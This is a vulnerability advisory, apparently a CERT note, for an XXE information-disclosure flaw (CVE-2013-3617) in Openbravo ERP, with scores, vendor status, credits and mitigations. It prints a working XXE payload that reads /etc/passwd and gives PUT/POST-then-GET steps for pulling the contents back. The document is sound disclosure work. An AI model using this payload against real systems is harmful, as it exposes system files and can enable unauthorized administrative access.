CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:M/Au:S/C:P/I:N/A:N
EPSS
Percentile
95.8%
Openbravo ERP 2.5, 3, and possibly earlier versions contain an information disclosure vulnerability (CWE-200).
CWE-200: Information Exposure
Openbravo ERP version 2.5 and version 3 contain an information disclosure vulnerability. This is due to the expanded use of XML External Entity (XXE) Processing. An attacker can send specially crafted XML requests to the XML API and have the application return the contents of files on the filesystem.
An example of this request is listed here:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT comments ANY >
<!ENTITY xxe SYSTEM "``<file:///etc/passwd>``" > ]>
<ob:Openbravo xmlns:ob="``<http://www.example.com>``"
xmlns:xsi="``<http://www.w3.org/2001/XMLSchema-instance>``">
<Product id="C970393BDF6C43E2B030D23482D88EED" identifier="Zumo de Pi༚ 0,5L">
<id>C970393BDF6C43E2B030D23482D88EED</id>
<comments>&xxe;</comments>
</Product>
</ob:Openbravo>
If sent as a PUT or POST request to the respective REST endpoint, this will update the product with the contents of /etc/passwd in the comment section of the product. You may then make a GET request to the respective product’s REST endpoint to receive the contents back and parse the file’s contents.
For more details, please see Tod Beardsley’s Rapid7 blog post.
An authenticated attacker can send specially crafted XML requests to the XML API and have the application read the contents of the filesystem. This may be used to obtain unauthorized administrative access to the system.
Apply an Update
OpenBravo has released an update to address this vulnerability. Please refer to their issue tracker for more details.
You may also want to consider using the following workaround.
Disable XXE
By disabling the external general entities feature of the SAXParserFactory used to parse the XML within Java code, the attacker cannot successfully make these XML requests. More details can be found on the OWASP XML External Entity (XXE) Processing page.
533894
Filter by status: All Affected Not Affected Unknown
Filter by content: __ Additional information available
__ Sort by: Status Alphabetical
Expand all
Javascript is disabled. Click here to view vendors.
Notified: September 03, 2013 Updated: September 11, 2013
Affected
We have not received a statement from the vendor.
We are not aware of further vendor information regarding this vulnerability.
Group | Score | Vector |
---|---|---|
Base | 3.5 | AV:N/AC:M/Au:S/C:P/I:N/A:N |
Temporal | 2.7 | E:POC/RL:OF/RC:C |
Environmental | 0.9 | CDP:L/TD:L/CR:ND/IR:ND/AR:ND |
Thanks to Tod Beardsley and Brandon Perry of Rapid7, Inc. for reporting this vulnerability.
This document was written by Adam Rauf.
CVE IDs: | CVE-2013-3617 |
---|---|
Date Public: | 2013-10-30 Date First Published: |
cwe.mitre.org/data/definitions/200.html
sourceforge.net/projects/openbravo/files/01-openbravo-appliances/
wiki.openbravo.com/wiki/Updates_and_upgrades
www.openbravo.com/
community.rapid7.com/community/metasploit/blog/2013/10/30/seven-foss-disclosures-part-one
www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing